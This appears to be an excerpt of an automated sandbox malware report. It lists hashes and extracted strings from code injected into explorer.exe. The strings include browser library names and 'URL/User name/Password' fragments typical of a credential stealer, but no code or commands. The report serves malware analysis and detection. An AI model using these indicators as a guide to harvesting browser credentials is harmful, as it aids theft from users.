• Instruction ID: 8112d0a373bd90378ead5c39044377808277f0973c80ef457892535071e74154
• Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction Fuzzy Hash: 3F41D070A18B088FDF14DF88A4457BE7BE2FB88700F00065ED80AD3245DBB59D458BD6

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                  • API String ID: 0-1539916866
                                                                                                                                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                  • Instruction ID: 38a4dd699699f37933ad74f56680786e6aba8b2491365efdea4123b8c91a03d1
                                                                                                                                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                  • Instruction Fuzzy Hash: F741B071A18B088FDF18DF88A4656AD7BF6FB48700F40025ED409D3346DBB5AD458BD6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                  • API String ID: 0-355182820
                                                                                                                                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction ID: ee4d0e9f3ec27e8a14020aa5ed6fb814a3f194ae73d4cff3bf45766b071d5eef
                                                                                                                                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction Fuzzy Hash: 39C14C70228B099FC758EF64D4956EAF7E1FF94304F504B1E94AAC7210DF30A915CB8A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                  • API String ID: 0-355182820
                                                                                                                                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction ID: 46dcd6ab209218711096af32ab62acac9ba1d174f5935aa814ab460396141b2e
                                                                                                                                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction Fuzzy Hash: 55C17C74228B098FC758EF24C4956EAF3E5FB94304F444B2E969EC7250DF70A915CB86
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                  • API String ID: 0-355182820
                                                                                                                                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction ID: ae936ef25afe6862fc453e98aef32a3d2ae2a861ebdf17a234ade8743c6c65a9
                                                                                                                                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction Fuzzy Hash: 7BC16971618B098FC758EF68C485AEAF3E1FF98304F50472E959AC7211DF34A615CB8A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                  • API String ID: 0-97273177
                                                                                                                                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction ID: 04f8a78c667226b9ef295066eabc2ec038de7312f21c13588c1ccfefb8ad2057
                                                                                                                                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction Fuzzy Hash: 6951F37112C7488FD719DF58D8852AAB7E5FBC5704F501A2EE8CBC7241DBB49906CB82
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                  • API String ID: 0-97273177
                                                                                                                                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction ID: 055a6df9268754884fa4103c15caab1a5d5a8d6f60c91d288dbd6bf88cb6d8d0
                                                                                                                                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction Fuzzy Hash: 4B51C1701187488FD719DF18C8852AEB7E5FBC4300F541E2EEA8BC7252DBB49906CB82
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                  • API String ID: 0-97273177
                                                                                                                                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction ID: ed256cdc8848dae87ce69ab87a08ed26a584cd10bddb042ece2a032f8cac14d6
                                                                                                                                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction Fuzzy Hash: 3251E5311197488FD719DF58D4812EAB7E5FBC5704F501A2EE8CBC7252DBB89906CB82
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                  • Instruction ID: 2466a5681a2565ced4fe7fa36fef9b8237d3c83a2cd54ccbd1f004ab7e8310d5
                                                                                                                                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                  • Instruction Fuzzy Hash: 14C19E70628E198FC758EF68E455AAAF3E1FB98300F55472D844AD7251DF30AE05CBC9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                  • Instruction ID: 5158e48eb5c11daf85561a369112d34f77d91b5049269cdad8c97abfb99287a8
                                                                                                                                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                  • Instruction Fuzzy Hash: 20C19D70628A198FC758EF68E495AAAF3E1FB98300F55472D844AD7251DF30AE01CB89
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                  • Instruction ID: e79fff370083852d04abd496d0ed48f72eb78e792db9774a0b22e5993aa481c0
                                                                                                                                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                  • Instruction Fuzzy Hash: 13C18F70618A1A4FCB58EF68D455AEAB3E1FF98304F944B29960EC7251DF30E905CBC5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                  • Instruction ID: 1a13c83d6ed5f2ee854c0c53d8113da4b4b124a254185a69b438cf0c34565260
                                                                                                                                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                  • Instruction Fuzzy Hash: 9CC18E70618E1A4FCB58EB68D455AEAB3E1FF98304F844B29860EC7251DF30EA05CBC5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
• Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
• Instruction ID: 6bd5c0fbb13b8ce2635b60d5fcbac69976cae13f237a4675ceb963aa29f9d1a7
• Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
• Instruction Fuzzy Hash: 95C1A072619B198FC758EF68C495AEAF7E1FF98300F91432D940AC7252DF34A906C789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
• Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
• Instruction ID: 18a8a52ce34c2e2fe2d9fb7b092298559be6e31ec77e5932125a13782247c2d4
• Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
• Instruction Fuzzy Hash: 61C19F72619B198FC758EF68C495AEAF7E1FF98300F91432D940AC7252DF34A906C789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
• Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
• Instruction ID: 2076f59be7c679ec26746106d2e5d8033dd8927101b52d21e95235bf3d413f4f
• Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
• Instruction Fuzzy Hash: E1A1C170628B488FDB18EFA8E4447EEB7E1FF89300F004A2DD48AD7251EF3499458789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
• Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
• Instruction ID: ae0ae3b7251af84ed9e030ce89a9a486d08c2c99222528ac59d50a51b47a54a3
• Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
• Instruction Fuzzy Hash: C6A19D706187488FDB28EFA8A4447EEB7E1FB88304F404A2DE58AD7251EB749945C789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
• Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
• Instruction ID: f9c94f919f15f58a3d82c68092f881055c945a0df3cb5db8910bfcb54ba29087
• Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
• Instruction Fuzzy Hash: EDA1BE716187488BDB28EFA89444BEEB7E1FF98300F40462EE48AD7252EF749545C789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
• Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
• Instruction ID: 0d429a59bf0a3258c73e753be269d50c07a35d9099f367b71456136b081e79d7
• Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
• Instruction Fuzzy Hash: 8191A170628B488FDB18EFA8E4447EEB7E1FF98304F00462ED48AD7251EF7489458789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
• Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
• Instruction ID: 99924d0049b5ae06e6bbbc331a6d4bac35523dea4bfc939bfb2b129436796d8a
• Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
• Instruction Fuzzy Hash: 3A918F706187488FDB18EFA8E4447EEB7E1FB88304F404A2ED58AD7251EF749945C789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
• Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
• Instruction ID: bb696c94c69ab7c36d8ca31ac13076216cddff10b77b31eb6dc05664a280f01c
• Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
• Instruction Fuzzy Hash: 2B91AF716187488BDB28EFA8D444BEEB7E1FF98304F40462EE48AD7242EF749545C789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: $.$e$n$v
• API String ID: 0-1849617553
• Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
• Instruction ID: 56de8c3960e2bfb0b0c569dbabc05323baeddc88eb9c0684065f4a081dc5eed1
• Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
• Instruction Fuzzy Hash: F3719031628B488FD758EFA8D4886AAB7F1FF58304F00062ED49AC7221EF71DD458B85

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: $.$e$n$v
• API String ID: 0-1849617553
• Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
• Instruction ID: 30e814686572f76a022ecac33a98e8dad9bf13c7421ffa674a1e8fcb88d792c5
• Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
• Instruction Fuzzy Hash: 1B719431618B498FD758EFA8D4887AEB7F5FF98304F000A2ED54AC7221EB71D9458B85

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: $.$e$n$v
• API String ID: 0-1849617553
• Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
• Instruction ID: 13f4a9afbbcf539d70f6220312832c5591fe9a0b860e881a99d157d48a5ed484
• Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
• Instruction Fuzzy Hash: F27173326187498FD758EFA8D4846AAB7F1FF94304F00062ED44AC7262EF75D9458B85

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: 2.dl$dll$l32.$ole3$shel
• API String ID: 0-1970020201
• Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
• Instruction ID: 6c689436aecf813f4cfa89a6c4942987fe0961670511cfe17d322ba8d6bbd66d
• Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
• Instruction Fuzzy Hash: 24514FB0928B4C8FDB54EFA4D045AEEB7F1FF58300F404A2E959AE7214EF7095418B89

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: 2.dl$dll$l32.$ole3$shel
• API String ID: 0-1970020201
• Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
• Instruction ID: 8caabeb5cbfce3d4951f6020f178f3c0851f0f6e895047bfbc3ad9faa9766f02
• Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
• Instruction Fuzzy Hash: C0515CB0918B4D8FDB64EFA4D045AEEB7E1FF58300F404A2E959AE7214EF7095418B89

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: 2.dl$dll$l32.$ole3$shel
• API String ID: 0-1970020201
• Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
• Instruction ID: 8ef3c0d306e1e7cc3fcd044fcb9a0f0dba6035d003b0570a8a2c7b24ea9684f7
• Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
• Instruction Fuzzy Hash: 95515CB1918B4C8FDB64EFA4C084AEEB7F1FF58300F40462E949AE7215EF3495458B89

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4$\$dll$ion.$vers
                                                                                                                                                  • API String ID: 0-1610437797
                                                                                                                                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction ID: 4a7dfc708a1f7ddebaf6133d533fa340247e08556458fef22c319f8da1034de1
                                                                                                                                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction Fuzzy Hash: D3416330228B4C8FCBB5EF6498557EA73E4FB99301F50462E949EC7241EF70D9458786
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4$\$dll$ion.$vers
                                                                                                                                                  • API String ID: 0-1610437797
                                                                                                                                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction ID: eada0a4ea91e2352e49ce81a29d90155d1a68453c259647a41e06c3b8b66969c
                                                                                                                                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction Fuzzy Hash: BF416E34228B498FDB75EF2498557EA73E4FB98311F444A2E998EC7240EF30DA45C782
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4$\$dll$ion.$vers
                                                                                                                                                  • API String ID: 0-1610437797
                                                                                                                                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction ID: d9b0fbec8519c7ca8c41d5466725ebd9d50504fa9404a18492272bc8841136da
                                                                                                                                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction Fuzzy Hash: B5418132219B4C8FCBB5EF6898457EA73E4FB98301F40462E989EC7242EF74D5058786
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                  • API String ID: 0-327345718
                                                                                                                                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction ID: d1cdbb1c8f9bf310c4410fd288e5964e94ef80088fc00d96c5b5980d071e5b7d
                                                                                                                                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction Fuzzy Hash: 53414430628E0D8FCB68EF68A0A57AE77E1FB58304F40456E984ED7351EA71D9418BC5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                  • API String ID: 0-327345718
                                                                                                                                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction ID: e9cc3b84989600885514ba66977696b0726bd9cf1deb6ba89800a051cab2198b
                                                                                                                                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction Fuzzy Hash: AA415E30A19E0D8FCF94EF6880A57EE77E1FF98301F44496E980ED7210DA71C9419B86
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                  • API String ID: 0-327345718
                                                                                                                                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction ID: 551dd685986502741063fc5b83e20ac410c7ef10453a630473c58e9105a9bf6a
                                                                                                                                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
